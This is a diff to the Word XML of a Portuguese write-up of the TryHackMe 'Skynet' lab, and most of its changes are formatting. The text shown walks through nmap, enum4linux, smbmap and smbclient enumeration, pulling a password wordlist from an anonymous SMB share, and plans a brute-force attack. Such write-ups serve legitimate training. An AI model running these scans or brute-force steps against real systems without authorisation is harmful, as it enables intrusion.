<commit_message>
feat(skynet): add write up
</commit_message>
<xml_diff>
--- a/TryHackMe/skynet/EIkebarbosa/writeup.docx
+++ b/TryHackMe/skynet/EIkebarbosa/writeup.docx
@@ -102,21 +102,23 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">Skynet </w:t>
-      </w:r>
+        <w:t>Skynet</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">– </w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -124,8 +126,18 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
+        <w:t xml:space="preserve">– </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
         <w:t>TryHackMe</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -232,13 +244,23 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t xml:space="preserve">Skynet </w:t>
+              <w:t>Skynet</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -354,6 +376,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -362,6 +385,7 @@
               </w:rPr>
               <w:t>None</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -976,7 +1000,7 @@
       </w:tr>
       <w:tr>
         <w:trPr>
-          <w:trHeight w:val="406"/>
+          <w:trHeight w:val="390"/>
         </w:trPr>
         <w:tc>
           <w:tcPr>
@@ -1046,6 +1070,82 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
               <w:t>Aprovação</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="390"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="704" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                <w:b/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                <w:b/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>3</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2126" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t>04/11/2024</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5664" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+              </w:rPr>
+              <w:t xml:space="preserve">2° Revisão </w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1268,9 +1368,14 @@
                 <w:color w:val="000000"/>
               </w:rPr>
               <w:tab/>
-              <w:t>3</w:t>
             </w:r>
           </w:hyperlink>
+          <w:r>
+            <w:rPr>
+              <w:color w:val="000000"/>
+            </w:rPr>
+            <w:t>6</w:t>
+          </w:r>
         </w:p>
         <w:p>
           <w:pPr>
@@ -1304,9 +1409,14 @@
                 <w:color w:val="000000"/>
               </w:rPr>
               <w:tab/>
-              <w:t>3</w:t>
             </w:r>
           </w:hyperlink>
+          <w:r>
+            <w:rPr>
+              <w:color w:val="000000"/>
+            </w:rPr>
+            <w:t>7</w:t>
+          </w:r>
         </w:p>
         <w:p>
           <w:pPr>
@@ -1338,9 +1448,14 @@
                 <w:color w:val="000000"/>
               </w:rPr>
               <w:tab/>
-              <w:t>3</w:t>
             </w:r>
           </w:hyperlink>
+          <w:r>
+            <w:rPr>
+              <w:color w:val="000000"/>
+            </w:rPr>
+            <w:t>8</w:t>
+          </w:r>
         </w:p>
         <w:p>
           <w:pPr>
@@ -1379,8 +1494,9 @@
           <w:r>
             <w:rPr>
               <w:color w:val="000000"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
-            <w:t>3</w:t>
+            <w:t>9</w:t>
           </w:r>
         </w:p>
         <w:p>
@@ -1414,9 +1530,14 @@
                 <w:color w:val="000000"/>
               </w:rPr>
               <w:tab/>
-              <w:t>3</w:t>
             </w:r>
           </w:hyperlink>
+          <w:r>
+            <w:rPr>
+              <w:color w:val="000000"/>
+            </w:rPr>
+            <w:t>11</w:t>
+          </w:r>
         </w:p>
         <w:p>
           <w:pPr>
@@ -1449,9 +1570,14 @@
                 <w:color w:val="000000"/>
               </w:rPr>
               <w:tab/>
-              <w:t>3</w:t>
             </w:r>
           </w:hyperlink>
+          <w:r>
+            <w:rPr>
+              <w:color w:val="000000"/>
+            </w:rPr>
+            <w:t>11</w:t>
+          </w:r>
         </w:p>
         <w:p>
           <w:r>
@@ -1752,6 +1878,7 @@
       </w:pPr>
       <w:bookmarkStart w:id="1" w:name="_heading=h.1fob9te" w:colFirst="0" w:colLast="0"/>
       <w:bookmarkEnd w:id="1"/>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -1764,6 +1891,7 @@
         </w:rPr>
         <w:t>Desenvolvimento</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1806,7 +1934,43 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Sempre começando com um simples nmap, aonde já é possível notar que há 6 portas abertas, sendo elas 22, 80, 110,139, 143 e 445</w:t>
+        <w:t xml:space="preserve">Sempre começando com um simples </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>aonde</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> já é possível notar que há 6 portas abertas, sendo elas 22, 80, 110,139, 143 e 445</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1849,7 +2013,79 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> nmap –sS –sC &lt;ip_target&gt;</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>nmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> –</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>sS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> –</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>sC</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ip_target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1954,7 +2190,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">: enum4linux &lt;ip_target&gt; </w:t>
+        <w:t>: enum4linux &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ip_target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">&gt; </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1981,7 +2235,43 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> smbmap –H &lt;ip_target&gt;</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>smbmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> –H &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ip_target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2059,7 +2349,35 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Há 2 que é possível analisar, mas o foco agora é no ”anonymous”. </w:t>
+        <w:t xml:space="preserve">Há 2 que é possível analisar, mas o foco agora é </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>no ”</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>anonymous</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">”. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2071,6 +2389,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2080,16 +2399,103 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Comando usado:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        <w:t>Comando</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:i/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> smbclient  //&lt;ip_target&gt;/anonymous</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>usado</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>smbclient</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  /</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/&lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ip_target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>&gt;/anonymous</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2168,8 +2574,18 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Tendo acesso, terá logo em seguida um arquivo para baixar e um diretório, aonde irá ter mais alguns arquivos para download .</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Tendo acesso, terá logo em seguida um arquivo para baixar e um diretório, aonde irá ter mais alguns arquivos para </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>download .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2195,7 +2611,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> mget *</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>mget</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> *</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2273,24 +2707,114 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Com os arquivos baixados, o primeiro a ser analizado será o “log1.txt”. Uma wordlist, aonde há uma pequena quantidade de supostas senhas.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>O outro arquivo entrega a informação do nome do alvo, porém, com os passos acima do write up, já foi possível determinar isso.</w:t>
+        <w:t xml:space="preserve">Com os arquivos baixados, o primeiro a ser </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>analizado</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> será o “log1.txt”. Uma </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>wordlist</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>aonde</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> há uma pequena quantidade de supostas senhas.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">O outro arquivo entrega a informação do nome do alvo, porém, com os passos acima do </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>write</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>up</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>, já foi possível determinar isso.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2368,7 +2892,43 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Com as duas informações, é necessário um diretório para realizar um ataque bruteforce. Com o gobuster isso é possível. </w:t>
+        <w:t xml:space="preserve">Com as duas informações, é necessário um diretório para realizar um ataque </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>bruteforce</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Com o </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>gobuster</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> isso é possível. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2380,6 +2940,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2390,16 +2951,152 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Comando usado:</w:t>
-      </w:r>
-      <w:r>
